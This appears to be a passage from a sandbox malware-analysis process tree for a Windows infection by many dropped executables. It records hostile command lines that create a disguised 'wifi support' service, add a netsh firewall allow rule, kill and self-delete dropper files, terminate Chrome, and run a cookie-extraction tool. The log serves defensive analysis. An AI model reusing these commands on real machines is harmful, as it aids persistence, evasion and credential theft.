"C:\Users\Admin\Pictures\Adobe Films\xCun5oTSnfKwvGBE78LifgJa.exe"
5⤵
PID:5904

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:3460

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:5784

C:\Users\Admin\Pictures\Adobe Films\8OL_WSQNx9ufzY2r40ocGR6Q.exe
"C:\Users\Admin\Pictures\Adobe Films\8OL_WSQNx9ufzY2r40ocGR6Q.exe"
5⤵
PID:5896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 616
6⤵
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 624
6⤵
PID:5324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 724
6⤵
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 748
6⤵
PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 872
6⤵
PID:5128

C:\Users\Admin\Pictures\Adobe Films\Is2OGryC66FUomUvyDnC0kk1.exe
"C:\Users\Admin\Pictures\Adobe Films\Is2OGryC66FUomUvyDnC0kk1.exe"
5⤵
PID:6068

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6068 -s 856
6⤵
PID:2348

C:\Users\Admin\Pictures\Adobe Films\CIVDl1fyRL4vy6ehqkOfMxCW.exe
"C:\Users\Admin\Pictures\Adobe Films\CIVDl1fyRL4vy6ehqkOfMxCW.exe"
5⤵
PID:5076

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
6⤵
PID:1032

C:\Users\Admin\AppData\Local\Temp\DM2BK.exe
"C:\Users\Admin\AppData\Local\Temp\DM2BK.exe"
7⤵
PID:4716

C:\Users\Admin\AppData\Local\Temp\DM2BK.exe
"C:\Users\Admin\AppData\Local\Temp\DM2BK.exe"
7⤵
PID:3604

C:\Users\Admin\AppData\Local\Temp\EF0G7M76F1AK415.exe
https://iplogger.org/1QuEf7
7⤵
- Executes dropped EXE
PID:4180

C:\Users\Admin\AppData\Local\Temp\231EM.exe
"C:\Users\Admin\AppData\Local\Temp\231EM.exe"
7⤵
PID:5712

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\HSCN.H
8⤵
PID:6008

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\HSCN.H
9⤵
PID:3896

C:\Users\Admin\AppData\Local\Temp\xli.exe
"C:\Users\Admin\AppData\Local\Temp\xli.exe"
6⤵
PID:4872

C:\Users\Admin\AppData\Local\Temp\xli.exe
"C:\Users\Admin\AppData\Local\Temp\xli.exe" -h
7⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:1432

C:\Users\Admin\AppData\Local\Temp\537ca911-dd51-46aa-b95a-6fd3c587b8ad.exe
"C:\Users\Admin\AppData\Local\Temp\537ca911-dd51-46aa-b95a-6fd3c587b8ad.exe"
7⤵
PID:564

C:\Users\Admin\AppData\Local\Temp\po50.exe
"C:\Users\Admin\AppData\Local\Temp\po50.exe"
6⤵
PID:5568

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
6⤵
PID:4856

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4856 -s 900
7⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\pub1.exe
"C:\Users\Admin\AppData\Local\Temp\pub1.exe"
6⤵
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4d77q8x9.7kp.bat""
7⤵
PID:6100

C:\Windows\system32\timeout.exe
timeout 3
8⤵
- Delays execution with timeout.exe
PID:4540

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
6⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:3468

C:\Users\Admin\AppData\Local\Temp\is-BURP7.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BURP7.tmp\setup.tmp" /SL5="$12002E,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
PID:552

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
8⤵
PID:5172

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
6⤵
PID:3484

C:\Users\Admin\AppData\Local\Temp\ip.exe
"C:\Users\Admin\AppData\Local\Temp\ip.exe"
6⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
PID:3944

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
6⤵
PID:4872

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
6⤵
PID:4636

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
6⤵
PID:5956

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
6⤵
PID:856

C:\Users\Admin\Pictures\Adobe Films\PL7j4pRQF4MLUafa_hJonMjD.exe
"C:\Users\Admin\Pictures\Adobe Films\PL7j4pRQF4MLUafa_hJonMjD.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 624
4⤵
- Program crash
PID:2712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 632
4⤵
PID:4408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 660
4⤵
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 724
4⤵
PID:5260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1244
4⤵
PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1252
4⤵
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1304
4⤵
PID:5812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1312
4⤵
PID:4512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "PL7j4pRQF4MLUafa_hJonMjD.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\PL7j4pRQF4MLUafa_hJonMjD.exe" & exit
4⤵
PID:1408

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "PL7j4pRQF4MLUafa_hJonMjD.exe" /f
5⤵
- Kills process with taskkill
PID:548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1104
4⤵
PID:6060

C:\Users\Admin\Pictures\Adobe Films\HogstkJZ7FRsznPeYYEJ2HPz.exe
"C:\Users\Admin\Pictures\Adobe Films\HogstkJZ7FRsznPeYYEJ2HPz.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im HogstkJZ7FRsznPeYYEJ2HPz.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\HogstkJZ7FRsznPeYYEJ2HPz.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5844

C:\Windows\SysWOW64\taskkill.exe
taskkill /im HogstkJZ7FRsznPeYYEJ2HPz.exe /f
5⤵
- Kills process with taskkill
PID:1100

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:736

C:\Users\Admin\Pictures\Adobe Films\MfN_VZYkE5btMp7mOPU23HYJ.exe
"C:\Users\Admin\Pictures\Adobe Films\MfN_VZYkE5btMp7mOPU23HYJ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:4964

C:\Users\Admin\Pictures\Adobe Films\hMp18012XfHVlbAMF8lh_Txk.exe
"C:\Users\Admin\Pictures\Adobe Films\hMp18012XfHVlbAMF8lh_Txk.exe"
3⤵
- Executes dropped EXE
PID:4836

C:\Users\Admin\Pictures\Adobe Films\jVbODZnSng89kIDwQa2GYabp.exe
"C:\Users\Admin\Pictures\Adobe Films\jVbODZnSng89kIDwQa2GYabp.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2212

C:\Users\Admin\Pictures\Adobe Films\uTs9yKYb6SzJrTI1Rk3FjQl7.exe
"C:\Users\Admin\Pictures\Adobe Films\uTs9yKYb6SzJrTI1Rk3FjQl7.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4848

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:3484

C:\Users\Admin\Pictures\Adobe Films\cX4dN1L1ydZ1pLFIf8VaB8Ur.exe
"C:\Users\Admin\Pictures\Adobe Films\cX4dN1L1ydZ1pLFIf8VaB8Ur.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2260

C:\Users\Admin\Pictures\Adobe Films\cX4dN1L1ydZ1pLFIf8VaB8Ur.exe
"C:\Users\Admin\Pictures\Adobe Films\cX4dN1L1ydZ1pLFIf8VaB8Ur.exe"
4⤵
PID:420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 564
5⤵
PID:3792

C:\Users\Admin\Pictures\Adobe Films\GVx0wE2dFIHdP9uCxf6e20jI.exe
"C:\Users\Admin\Pictures\Adobe Films\GVx0wE2dFIHdP9uCxf6e20jI.exe"
3⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im GVx0wE2dFIHdP9uCxf6e20jI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\GVx0wE2dFIHdP9uCxf6e20jI.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5992

C:\Windows\SysWOW64\taskkill.exe
taskkill /im GVx0wE2dFIHdP9uCxf6e20jI.exe /f
5⤵
- Kills process with taskkill
PID:1440

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:5484

C:\Users\Admin\Pictures\Adobe Films\9fzvGEEnW3EAj7oBxwMY1GYs.exe
"C:\Users\Admin\Pictures\Adobe Films\9fzvGEEnW3EAj7oBxwMY1GYs.exe"
3⤵
PID:4280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
4⤵
PID:5644

C:\Windows\SysWOW64\timeout.exe
timeout 45
5⤵
- Delays execution with timeout.exe
PID:6132

C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe
"C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe"
4⤵
PID:4308

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:5364

C:\Users\Admin\Pictures\Adobe Films\Oj7irqNAuWUOvG9WzT9luWw6.exe
"C:\Users\Admin\Pictures\Adobe Films\Oj7irqNAuWUOvG9WzT9luWw6.exe"
3⤵
PID:3924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rxfnsape.exe" C:\Windows\SysWOW64\qkpjmrap\
4⤵
PID:736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qkpjmrap\
4⤵
PID:4484

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create qkpjmrap binPath= "C:\Windows\SysWOW64\qkpjmrap\rxfnsape.exe /d\"C:\Users\Admin\Pictures\Adobe Films\Oj7irqNAuWUOvG9WzT9luWw6.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:4184

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description qkpjmrap "wifi internet conection"
4⤵
PID:1880

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start qkpjmrap
4⤵
PID:2296

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
- Executes dropped EXE
PID:5000

C:\Users\Admin\nixtnpni.exe
"C:\Users\Admin\nixtnpni.exe" /d"C:\Users\Admin\Pictures\Adobe Films\Oj7irqNAuWUOvG9WzT9luWw6.exe"
4⤵
PID:5388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\iaghphix.exe" C:\Windows\SysWOW64\qkpjmrap\
5⤵
PID:4660

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config qkpjmrap binPath= "C:\Windows\SysWOW64\qkpjmrap\iaghphix.exe /d\"C:\Users\Admin\nixtnpni.exe\""
5⤵
PID:756

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start qkpjmrap
5⤵
PID:420

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:5260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1188
5⤵
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 1188
4⤵
PID:5492

C:\Users\Admin\Pictures\Adobe Films\vT0tzpluFE59jvNHi49ML1JK.exe
"C:\Users\Admin\Pictures\Adobe Films\vT0tzpluFE59jvNHi49ML1JK.exe"
3⤵
PID:1420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:1240

C:\Users\Admin\Pictures\Adobe Films\D4sZ2Tpd5Kl3Do3u6PJvF1QY.exe
"C:\Users\Admin\Pictures\Adobe Films\D4sZ2Tpd5Kl3Do3u6PJvF1QY.exe"
3⤵
PID:948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:2276

C:\Users\Admin\Pictures\Adobe Films\gvftoCa10TTe6KssUipWAOsY.exe
"C:\Users\Admin\Pictures\Adobe Films\gvftoCa10TTe6KssUipWAOsY.exe"
3⤵
PID:3388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:2152

C:\Users\Admin\Pictures\Adobe Films\mlzMI0DOMCzlCuwUGzjUpkPD.exe
"C:\Users\Admin\Pictures\Adobe Films\mlzMI0DOMCzlCuwUGzjUpkPD.exe"
3⤵
PID:4180

C:\Users\Admin\Pictures\Adobe Films\fqG_utQ5KupwZRBNOoVuc18u.exe
"C:\Users\Admin\Pictures\Adobe Films\fqG_utQ5KupwZRBNOoVuc18u.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4040

C:\Users\Admin\Pictures\Adobe Films\6KIaTjAnVAuAqNMgILerqRz5.exe
"C:\Users\Admin\Pictures\Adobe Films\6KIaTjAnVAuAqNMgILerqRz5.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5008

C:\Users\Admin\Pictures\Adobe Films\VDavGkeFBQltxK7B4K2HycqO.exe
"C:\Users\Admin\Pictures\Adobe Films\VDavGkeFBQltxK7B4K2HycqO.exe"
3⤵
- Executes dropped EXE
PID:2020

C:\Users\Admin\Pictures\Adobe Films\8our3GnN1MK8nVk9KvhYIFMu.exe
"C:\Users\Admin\Pictures\Adobe Films\8our3GnN1MK8nVk9KvhYIFMu.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4236

C:\Users\Admin\Pictures\Adobe Films\cW6WSJiZUZ_3Q9Thb7X6ZpPt.exe
"C:\Users\Admin\Pictures\Adobe Films\cW6WSJiZUZ_3Q9Thb7X6ZpPt.exe"
3⤵
PID:5000

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4292

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4152

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2592

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4384

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4200

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3540

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2972

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 604
3⤵
- Program crash
PID:3740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2284 -ip 2284
1⤵
PID:3468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 1600 -ip 1600
1⤵
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1600 -ip 1600
1⤵
PID:2004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1600 -ip 1600
1⤵
PID:476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1600 -ip 1600
1⤵
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1600 -ip 1600
1⤵
PID:1028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1600 -ip 1600
1⤵
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1600 -ip 1600
1⤵
PID:1308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1600 -ip 1600
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1600 -ip 1600
1⤵
PID:948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1600 -ip 1600
1⤵
PID:1176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1600 -ip 1600
1⤵
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1600 -ip 1600
1⤵
PID:856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1600 -ip 1600
1⤵
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1600 -ip 1600
1⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1600 -ip 1600
1⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1600 -ip 1600
1⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1600 -ip 1600
1⤵
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1600 -ip 1600
1⤵
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1600 -ip 1600
1⤵
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1600 -ip 1600
1⤵
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1600 -ip 1600
1⤵
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4164 -ip 4164
1⤵
PID:4168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4164 -ip 4164
1⤵
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4164 -ip 4164
1⤵
PID:1184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4164 -ip 4164
1⤵
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4164 -ip 4164
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4164 -ip 4164
1⤵
PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4164 -ip 4164
1⤵
PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4164 -ip 4164
1⤵
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4164 -ip 4164
1⤵
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4164 -ip 4164
1⤵
PID:3996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4164 -ip 4164
1⤵
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4164 -ip 4164
1⤵
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4164 -ip 4164
1⤵
PID:640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4164 -ip 4164
1⤵
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4164 -ip 4164
1⤵
PID:2632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4164 -ip 4164
1⤵
PID:1376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4652 -ip 4652
1⤵
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4652 -ip 4652
1⤵
PID:1148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4652 -ip 4652
1⤵
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4652 -ip 4652
1⤵
PID:2968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4652 -ip 4652
1⤵
PID:400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4652 -ip 4652
1⤵
PID:2388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4652 -ip 4652
1⤵
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4652 -ip 4652
1⤵
PID:5008

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4652 -ip 4652
1⤵
PID:4000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4652 -ip 4652
1⤵
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4652 -ip 4652
1⤵
PID:1972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4652 -ip 4652
1⤵
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4652 -ip 4652
1⤵
PID:536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4652 -ip 4652
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4652 -ip 4652
1⤵
PID:3728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4652 -ip 4652
1⤵
PID:1432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4652 -ip 4652
1⤵
PID:312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4652 -ip 4652
1⤵
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4652 -ip 4652
1⤵
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4652 -ip 4652
1⤵
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4652 -ip 4652
1⤵
PID:484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4652 -ip 4652
1⤵
PID:928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4652 -ip 4652
1⤵
PID:2068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4652 -ip 4652
1⤵
PID:692

C:\Windows\SysWOW64\WerFault.exe
